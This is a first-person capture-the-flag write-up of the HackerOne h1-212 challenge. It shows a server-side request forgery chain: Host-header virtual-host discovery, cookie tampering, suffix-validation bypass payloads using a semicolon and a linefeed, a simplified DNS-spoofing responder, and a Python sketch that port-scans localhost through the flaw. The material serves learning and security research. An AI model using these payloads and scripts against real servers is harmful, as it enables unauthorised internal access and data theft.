With the h1-212 CTF, HackerOne offered a really cool chance to win a trip to New York City to hack on some exclusive targets in a top secret location. To be honest, I’m not a CTF guy at all, but this incentive caught my attention. The only thing one had to do to participate was solve the CTF challenge, document the hacky way in, and hope to get selected in the end. So I decided to participate and try to get onto the plane - unfortunately my write-up wasn’t selected in the end, but I’d still like to share it for learning purposes :-)
Thanks to Jobert and the HackerOne team for creating a fun challenge!
The CTF was introduced by just a few lines of story:
An engineer of acme.org launched a new server for a new admin panel at http://184.108.40.206/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!
While this engineer sounds very self-confident, there is one big hint in these few lines that provides a first foot in the door: acme.org.
The first visit to the given URL showed nothing more than the “default Apache” page:
Identify All the Hints!
While brute-forcing a default Apache2 installation doesn’t make much sense (unless you want to rediscover /icons ;-) ), it was immediately clear that a different approach was required to solve this challenge.
What has proven quite fruitful in my bug bounty career is changing the Host header in order to reach other virtual hosts configured on the same web server. In this case, it took me only a single try to find out that the “new admin panel” of “acme.org” was actually located at “admin.acme.org” - so the Host header was changed from the server’s IP address to “admin.acme.org”:
The Apache default page was suddenly gone and the web server returned a different response:
As you might have noticed already, there is one line in this response that looks utterly suspicious: the web application issued a “Set-Cookie” directive setting the value of the “admin” cookie to “no”.
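This Host-header probe can be sketched in a few lines of Python; the hostname is the one from the challenge, and nothing here actually touches the network:

```python
# Sketch: probing for a virtual host by overriding the Host header.
# The hostname comes from the challenge; this only builds the raw bytes.
def build_vhost_probe(vhost: str, path: str = "/") -> bytes:
    request = (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {vhost}\r\n"  # the only line that changes per guess
        "Connection: close\r\n"
        "\r\n"
    )
    return request.encode()

probe = build_vhost_probe("admin.acme.org")
```

Sending the same path to the same IP with different Host values is all it takes to enumerate virtual hosts.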
Building a Bridge Into the Teapot
While it’s always good to have a healthy portion of self-confidence, the engineer of acme.org seemed to have a bit too much of it when it comes to “the server can’t be hacked”.
Since cookies are, after all, user-controllable, imagine what would happen if the “admin” cookie value were changed to “yes”?
Surprise, the web application responded differently with an HTTP 405 like the following:
An HTTP 405 means the HTTP verb is not allowed, so it needed to be changed. When switched to HTTP POST:
The web application again responded differently with an HTTP 406 this time:
While googling around for this unusual status code, I came across the following description by the W3C:
10.4.7 406 Not Acceptable
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.
Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.
Jumping into the Teapot
So it seemed to be about a missing Content-Type declaration. After a “Content-Type” header of “application/json” was added to the request:
A third HTTP response code - HTTP 418 aka “the teapot” was returned:
Now it was pretty obvious that this was a JSON-based endpoint. By supplying an empty JSON body as part of the HTTP POST request:
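Collecting the steps so far, the request can be sketched as follows. The endpoint path “/” is an assumption (the write-up doesn’t name it); the headers are the ones derived step by step above:

```python
import json

# Sketch of the request assembled so far; path "/" is an assumption.
headers = {
    "Host": "admin.acme.org",            # reach the admin virtual host
    "Cookie": "admin=yes",               # flip the suspicious cookie
    "Content-Type": "application/json",  # cures the HTTP 406
}
body = json.dumps({})                    # empty JSON body, i.e. "{}"

request = (
    "POST / HTTP/1.1\r\n"                # POST cures the HTTP 405
    + "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    + f"Content-Length: {len(body)}\r\n\r\n"
    + body
)
```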
The application responded with the missing parameter name:
Given the parameter name, this smelled a bit like a nifty Server-Side Request Forgery challenge.
Short Excursion to SSRF
What I usually do as a precaution in such scenarios is to have a separate domain like “rcesec.com”, whose authoritative NS servers point to an IP/server under my control, in order to be able to spoof DNS responses of all kinds. So, for example, “ns1.rcesec.com” and “ns2.rcesec.com” are the authoritative NS servers for “rcesec.com”, and both point to the IP address of one of my servers:
On the nameserver side, I like to use the really awesome tool “dnschef” by iphelix, which is capable of spoofing all kinds of DNS records - A, AAAA, MX, CNAME, NS - to whatever value you like. I usually point all A records to the loopback address 127.0.0.1 to discover some interesting data:
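dnschef does the heavy lifting here, but the core trick - answering every A query with an attacker-chosen address - fits in a heavily simplified sketch. This assumes exactly one question and no EDNS/additional records in the query, so treat it as an illustration, not a replacement for dnschef:

```python
import socket
import struct

def spoof_a_reply(query: bytes, fake_ip: str = "127.0.0.1") -> bytes:
    """Greatly simplified version of what dnschef does: answer any
    A query with an attacker-chosen address. Assumes the query holds
    exactly one question and no EDNS/additional records."""
    txid = query[:2]                           # copy the transaction ID
    flags = struct.pack(">H", 0x8180)          # standard response, no error
    counts = struct.pack(">HHHH", 1, 1, 0, 0)  # 1 question, 1 answer
    question = query[12:]                      # echo the question section
    answer = (
        b"\xc0\x0c"                            # compression pointer to the name
        + struct.pack(">HHIH", 1, 1, 60, 4)    # type A, class IN, TTL 60, 4 bytes
        + socket.inet_aton(fake_ip)
    )
    return txid + flags + counts + question + answer
```

Bound to a UDP socket on port 53, a loop around this function is enough to make any hostname under the delegated zone resolve to 127.0.0.1.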
Breaking the Teapot
Going on with the exploitation and adding a random sub-domain under my domain “rcesec.com”:
resulted in the following response:
Funny side note: I accidentally bypassed another input filter, which required the subdomain part of the “domain” parameter to include the string “212” - but I only noticed this at the end of the challenge :-D
So it seemed that the application accepted the value and responded with a reference to a new PHP file (remember: PHP seems to be Jobert Abma’s favorite programming language ;-) ). When the proposed request was issued against the read.php file:
The application responded with a huge base64-encoded string:
What was even more interesting here is that the listening dnschef actually received a remote DNS lookup for “h1-212.rcesec.com” as a direct consequence of the read.php call, which it successfully spoofed to “127.0.0.1”:
While this was the confirmation that the application actively interacts with the given “domain” value, there was also a second confirmation in the form of the base64-encoded string returned in the response body, which, when decoded, turned out to be the actual content of the web server listening on localhost:
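Decoding such a response is a one-liner; the {"data": …} shape used below is modelled on the read.php responses shown above:

```python
import base64
import json

# Hypothetical read.php response shape, modelled on the write-up:
# {"data": "<base64 of the fetched page>"}
page = b"<html>localhost content</html>"
response_body = json.dumps({"data": base64.b64encode(page).decode()})

decoded = base64.b64decode(json.loads(response_body)["data"])
```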
The Wrong Direction
While I was at first somewhat convinced that the flag had to reside somewhere on the localhost (due to a thrill of anticipation, probably? ;-) ), I wanted to retrieve the contents of Apache’s server-status page (which is usually bound to localhost) to potentially fetch the flag from there. However, when trying to query that page using the following request (remember: “h1-212.rcesec.com” actually resolved to “127.0.0.1”, which applies to all further requests):
The application just returned an error, indicating that there was at least a very basic validation of the domain name in place, requiring the value to end with the string “.com”:
Bypassing the Domain Validation (Part 1)
OK, so the application expected the domain to end with “.com”. When trying to bypass this in common ways, e.g. using “?”:
The application always responded with:
The same applied to “&”, “#” and (double-)URL-encoded representations of them. However, when a semicolon was used:
The application responded again with a reference to the read.php file:
Following that one, indeed returned a base64-encoded string of the server-status output:
While I was thinking “yeah, I finally got it”, it turned out that there wasn’t a flag anywhere. Although I suspect the engineer didn’t intend to expose the Apache server-status page at all ;-) :
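Why does the semicolon slip through? If the server-side check is a naive suffix comparison - an assumption on my side, since the server code isn’t visible - then a value like the one below satisfies the validator while still smuggling a path to the SSRF target:

```python
def naive_domain_check(domain: str) -> bool:
    # Assumed server-side validation: only the ".com" suffix is inspected.
    return domain.endswith(".com")

# ";.com" is just trailing path data to the web server behind the SSRF,
# while the validator only sees a value ending in ".com".
payload = "h1-212.rcesec.com/server-status;.com"
```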
The Right Direction
After poking around on the localhost for a while without finding the flag, I decided to go a different way and use the discovered SSRF vulnerability to see whether there were any other ports listening on localhost that are otherwise not visible from the outside. To be clear: a port scan of the target host from the Internet revealed only ports 22 and 80 open:
Since port 22 was known to be open, the SSRF vulnerability could easily be used to verify whether that port was also reachable via localhost:
This returned the following output (after querying the read.php file again):
Et voilà. Since scanning all ports manually and requesting everything through the read.php file was a bit inefficient, I wrote a small Python script that scans a range of given port numbers (e.g. from 81 to 1338), fetches the “next” response and finally tries to base64-decode its value:
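My original script isn’t reproduced here, but its core logic can be sketched as follows. The `fetch` callable stands in for the two HTTP round trips (POST the domain payload, then GET the returned read.php reference), so the loop can be shown without a live target:

```python
import base64
import json

def scan_ports(ports, fetch):
    """Probe localhost ports through the SSRF endpoint.

    `fetch(payload) -> response body` abstracts the two HTTP calls
    per port; the payload shape mirrors the ";.com" bypass above.
    """
    results = {}
    for port in ports:
        body = fetch(json.dumps({"domain": f"h1-212.rcesec.com:{port};.com"}))
        try:
            results[port] = base64.b64decode(json.loads(body)["data"])
        except (ValueError, KeyError):
            continue  # closed/filtered port: nothing decodable came back
    return results
```

Plugging in a real `fetch` built on any HTTP client turns this into the actual scanner; only ports whose responses carry decodable data end up in the result dictionary.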
When run, my script finally discovered another open port: 1337 (damn, that was obvious ;-) ):
Bypassing the Domain Validation (Part 2)
So it seemed like the flag could be located somewhere on the service behind port 1337. However, I noticed an interesting behaviour I hadn’t thought about earlier: when a single slash after the port number was used:
The web application always returned an HTTP 404:
This is simply due to the fact that the semicolon was interpreted by the web server as part of the path itself. So if “;.com” did not exist on the remote server, the web server always returned an HTTP 404. To overcome this hurdle, a bit of creative thinking was required. Assuming the flag file was simply named “flag”, the following had to be met in the end:
The domain had to end with “.com”
The URL-splitting characters “?”, “&”, “#” and their (double-)URL-encoded variants were not allowed
In the end the following request actually met all conditions:
Here I used a Unicode linefeed character to split the domain name into two parts. This actually triggered two separate requests, which could be observed via the number in the read.php “id” parameter. When a single request without the linefeed character was issued:
the application returned the ID “0”:
However when the linefeed payload was issued:
The read.php “id” parameter was suddenly increased by two, to “2”, instead:
This indicated that the application accepted both “domains”, leading to two different requests being sent. Querying the ID value minus one therefore returned the result of the call to “h1-212.rcesec.com:1337/flag”:
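Reassembled from the observations above, the final payload presumably looked something like the following - the exact value is an assumption (only the first half, the port-1337 /flag fetch, is confirmed above), and the injected linefeed is shown as a plain `\n` for simplicity:

```python
import json

# Reconstructed payload (assumption); the server appears to treat each
# line as its own domain, firing one request per line.
payload = "h1-212.rcesec.com:1337/flag\nh1-212.rcesec.com"

first, second = payload.split("\n")     # the flag fetch, plus a dummy ".com" tail
body = json.dumps({"domain": payload})  # JSON escapes the linefeed as \n
```

The whole value still ends with “.com” and both halves contain “212”, so all the filters observed earlier stay satisfied.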
When the “data” value was base64-decoded, it finally revealed the flag: